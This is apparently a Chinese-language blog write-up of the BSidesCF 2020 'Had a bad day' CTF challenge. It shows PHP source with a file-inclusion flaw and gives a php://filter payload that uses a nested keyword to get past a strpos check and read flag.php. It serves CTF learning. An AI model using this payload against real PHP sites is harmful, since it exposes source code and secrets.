[BSidesCF 2020]Had a bad day WP

这道题先用php://filter/convert.base64-encode/resource=index(这道题不带后缀名)读取出index.php的源码:

              <?php
                $file = $_GET['category'];

                if(isset($file))
                {
                    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
                        include ($file . '.php');
                    }
                    else{
                        echo "Sorry, we currently only support woofers and meowers.";
                    }
                }
                ?>


            </div>
          <form action="index.php" method="get" id="choice">
              <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
              <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
          </form>

strpos()函数的意思是查当前字符串第一次出现的位置,返回结果就是要查的字符串前面有几个字符。

很明显,这道题要求get传参里有woofers、meowers、index然后进行文件包含

重点是伪协议可以嵌套协议:/index.php?category=php://filter/convert.base64-encode/index/resource=flag

知识点:

1.strpos()函数返回要查询的字符串前面有几个字符

2.?file=php://filter/convert.base64-encode/resource=flag.php    在文件包含漏洞中,传参传这个就相当于传了要读取的文件名是lag.php

3.?file=php://filter/convert.base64-encode/resource=flag.php              在/convert.base64-encode/和/resource=flag.php之间可以添加任何字符,不影响,比如这道题传参必须有woofers、meowers、index,就把这三个里的任意一个传过去,就可以得到flag.php的文件内容base64编码后的值了

 

posted @ 2022-06-27 02:28  Galio  阅读(32)  评论(0编辑  收藏  举报